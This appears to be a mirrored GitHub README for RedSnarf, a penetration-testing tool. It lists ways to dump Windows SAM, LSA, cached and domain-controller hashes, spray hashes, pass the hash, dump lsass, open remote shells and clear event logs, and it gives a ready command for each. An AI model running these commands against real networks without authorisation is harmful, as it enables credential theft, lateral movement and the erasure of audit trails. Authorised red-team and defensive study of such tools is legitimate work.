Giters

MyChickenNinja / redsnarf

RedSnarf is a pen-testing / red-teaming tool for Windows enviroments

Home Page:https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/november/introducing-redsnarf-and-the-importance-of-being-careful/

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

     ______           .____________                     _____  
\______   \ ____   __| _/   _____/ ____ _____ ________/ ____\ 
 |       _// __ \ / __ |\_____  \ /    \\__  \\_  __ \   __\  
 |    |   \  ___// /_/ |/        \   |  \/ __ \|  | \/|  |    
 |____|_  /\___  >____ /_______  /___|  (____  /__|   |__|    
        \/     \/     \/       \/     \/     \/         

RedSnarf is a pen-testing / red-teaming tool by Ed William and Richard Davy for retrieving hashes and credentials from Windows workstations, servers and domain controllers using OpSec Safe Techniques.

RedSnarf functionality includes: 

•	Retrieval of local SAM hashes;
•	Enumeration of user/s running with elevated system privileges and their corresponding lsa secrets password;
•	Retrieval of MS cached credentials;
•	Pass-the-hash;
•	Quickly identify weak and guessable username/password combinations (default of administrator/Password01);
•	The ability to retrieve hashes across a range;
•	Hash spraying - 
o	Credsfile will accept a mix of pwdump, fgdump and plain text username and password separated by a space;
•	Lsass dump for offline analysis with Mimikatz;
•	Dumping of Domain controller hashes using NTDSUtil and retrieval of NTDS.dit for local parsing;
•	Dumping of Domain controller hashes using the drsuapi method;
•	Retrieval of Scripts and Policies folder from a Domain controller and parsing for 'password' and 'administrator';
•	Ability to decrypt cpassword hashes;
•	Ability to start a shell on a remote machine;
•	The ability to clear the event logs (application, security, setup or system); (Internal Version Only)
•	Results are saved on a per-host basis for analysis.

RedSnarf Usage
=======================

Requirements:
Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git
CredRetrieve 7 - https://github.com/Neohapsis/credRetrieve7
Lsass Retrieval using procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Netaddr (0.7.12) - easy_install install netaddr
Termcolor (1.1.0) - easy_install termcolor
dos2unix - used with parsing Mimikatz info locally 

Show Help
./redsnarf.py -h
./redsnarf.py --help

Retrieve Local Hashes
=======================

Retrieve Local Hashes from a single machine using weak local credetials and clearing the Security event log
./redsnarf.py -H 10.0.0.50 -s security

Retrieve Local Hashes from a single machine using weak local credetials and clearing the application event log
./redsnarf.py -H 10.0.0.50 -s application

Retrieve Local Hashes from a single machine using local administrator credentials
./redsnarf.py -H 10.0.0.50 -u administrator -p Password01 -D .

Retrieve Local Hashes from a single machine using domain administrator credentials
./redsnarf.py -H 10.0.0.50 -u administrator -p Password01 -D yourdomain.com

Retrieve Hashes across a network range using local administrator credentials
./redsnarf.py -H 10.0.0.1/24 -u administrator -p Password01 -D .

Retrieve Hashes across a network range using domain administrator credentials
./redsnarf.py -H 10.0.0.1/24 -u administrator -p Password01 -D yourdomain.com


Hash Spraying
=======================

Spray Hashes across a network range 
./redsnarf.py -H 10.0.0.1/24 -C credsfile -D .

Retrieve Hashes across a network range domain login
./redsnarf.py -H 10.0.0.1/24 -C credsfile -D yourdomain.com


Retrieve Domain Hashes
=======================

Retrieve Hashes using drsuapi method (Quickest)
./redsnarf.py -H 10.0.0.1 -u administrator -p Password01 -D yourdomain.com -i y

Retrieve Hashes using NTDSUtil
./redsnarf.py -H 10.0.0.1 -u administrator -p Password01 -D yourdomain.com -n y


Information Gathering
=======================

Copy the Policies and Scripts folder from a Domain Controller and parse for password and administrator
./redsnarf.py -H 10.0.0.1 -u administrator -p Password01 -D yourdomain.com -P y

Decrypt Cpassword
./redsnarf.py -g cpassword


Misc
=======================

Start a Shell on a machine using local administrator credentials
./redsnarf.py -H 10.0.0.50 -u administrator -p Password01 -D . -d y

Start a Shell on a machine using domain administrator credentials
./redsnarf.py -H 10.0.0.50 -u administrator -p Password01 -D yourdomain.com -d y

Retrieve a copy of lsass for offline parsing with Mimikatz on a machine using local administrator credentials
./redsnarf.py -H 10.0.0.50 -u administrator -p Password01 -D . -l y

Additional Information
=======================

For more information please visit:
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/november/introducing-redsnarf-and-the-importance-of-being-careful/

About

RedSnarf is a pen-testing / red-teaming tool for Windows enviroments

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/november/introducing-redsnarf-and-the-importance-of-being-careful/

License:Apache License 2.0

Languages

Language:Python 100.0%